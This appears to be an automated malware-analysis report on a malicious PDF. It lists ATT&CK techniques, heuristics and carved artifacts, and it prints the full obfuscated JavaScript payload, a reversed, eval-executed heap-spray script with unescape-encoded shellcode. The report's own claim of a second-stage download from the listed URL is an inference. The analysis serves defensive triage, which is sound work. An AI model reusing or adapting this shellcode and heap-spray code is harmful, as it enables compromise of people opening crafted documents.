MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, named 'javascript_obj0012_000.js', is likely responsible for downloading and executing a second-stage payload from the embedded URL 'http://www.bitstream.com'. The presence of ASCIIHexDecode filter with exploit indicators further suggests malicious intent.
Machine Learning
- Nyx PDF Classifier malicious score 0.9997
Heuristics 5
-
ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEXHex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.bitstream.com In PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0012_000.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0x104F0 | 3780 bytes |
SHA-256: 7016c9d9581a7ced8c75c217dab213a78fd7be2c283364c13a48c95e4938aa49 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var eva=new Function("a","ev al (a);".split(" ").join(""));
var s=' ;"s"+ZxFfI=]jNheY[T )++jNheY;0f1x0<jNheY;0=jNheY( rof ;)(yarrA wen = T rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.ihadQ = ZxFfI ;ihadQ =+ ihadQ )00008x0 < htgnel.ihadQ(elihw ;)2/63556 ,0(gnirtsbus.TxCgy = ihadQ ;ABpL =+ TxCgy ;Prl =+ TxCgy ;)2/)42x0-c0c0x0( ,0(gnirtsbus.ABpL = TxCgy ;ABpL=+ABpL )63556 < 8 + 02 + htgnel.ABpL( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (X = ABpL rav ;) )""(nioj.)" "(tilps."4a14 u % 7f2b u % 85ab u % f471 u % 17f1 u % bdb4 u % 2187 u % bd95 u % debc u % 24ca u % cf1b u % 50ae u % 474b u % 1f2f u % d74c u % 7c 07 u % 7868 u % 99e4 u % 2d3b u % 1f68 u % f419 u % efcc u % 484d u % 9733 u % f0b3 u % 0120 u % c 0b0 u % e08f u % 6722 u % fc86 u % b242 u % b99c u % f568 u % 22b6 u % f3ed u % 3425 u % 6627 u % 79a2 u % 2a92 u % 3cc 0 u % d689 u % 649e u % 5dc9 u % 7b52 u % 9887 u % afe2 u % 9f27 u % 517b u % 9134 u % d5f0 u % 483e u % 1897 u % f389 u % cf97 u % 3cb5 u % 30a0 u % 38b5 u % e82f u % cb25 u % ead1 u % c336 u % 663c u % 7405 u % 9c7f u % a791 u % 403e u % a581 u % e6bb u % 110e u % dbfa u % e00b u % 8c51 u % b6e6 u % 07d6 u % bb1e u % 8ab4 u % e839 u % 9fb5 u % 5d4d u % 6f60 u % 198a u % 3e7c u % 8a76 u % ea7e u % 4d51 u % c656 u % 8c9b u % b634 u % de67 u % ad5e u % 1217 u % 9478 u % c614 u % 0abe u % 7e30 u % 1fbd u % 0764 u % 0c9c u % 9f3a u % f369 u % 6fb5 u % 6dfd u % 3872 u % 0771 u % 7130 u % 1307 u % 3085 u % 2dd3 u % eb7e u % 1b33 u % 424f u % 9d47 u % 339c u % ad0c u % 0070 u % f211 u % 0070 u % 137d u % 0070 u % d451 u % ff09 u % ffff u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 0909 u % 0909 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 0909 u % 0909 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 0909 u % ff09 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % ffff u % 8e6e u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % be50 u % 57ee u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % c 0c 0 u % c 0c 0 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 18bf u % 2c40 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 4038 u % 380c u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 9881 u % b8a1 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 5185 u % a5be u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 4509 u % a509 u % 0070 u % bb51 u % 0070 u % 137d u % 0000 u % 0400 u % 0000 u % 0001 u % 1000 u % 4010 u % 0000 u % 0000 u % 1000 u % 0010 u % ffff u % ffff u % 0070 u % 45c5 u % 0070 u % 2e25 u % 1000 u % 1100 u % 0070 u % 7f27 u % 0070 u % ca8a u % 1000 u % 0010 u % 0070 u % bb51 u % 0070 u % ca8a u % 1000 u % 1100 u % 0070 u % bb51 u % 0070 u % 2bf7 u % eff7 u % 0030 u % 0070 u % bb51 u % 0070 u % d451 u % 0000 u % 0001 u % 0070 u % bb51 u % 1000 u % 4010 u % 0070 u % 7f27 u % 1000 u % 4210 u % 0070 u % 9951 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % c 0c 0 u % c 0c 0 u % 0070 u % 4809 u % 0070 u % 3309 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % cccc u % cccc u % 0070 u % f651 u % 0070 u % fe84 u % cccc u % cccc u % 0070 u % 9194 u % c 0c 0 u % c 0c 0 u % " (X = Prl rav ;epacsenu = X rav ';
eva(s.split("").reverse().join(""));
|
|||
font_00_sfnt_off00000319.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x319 | 65932 bytes |
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.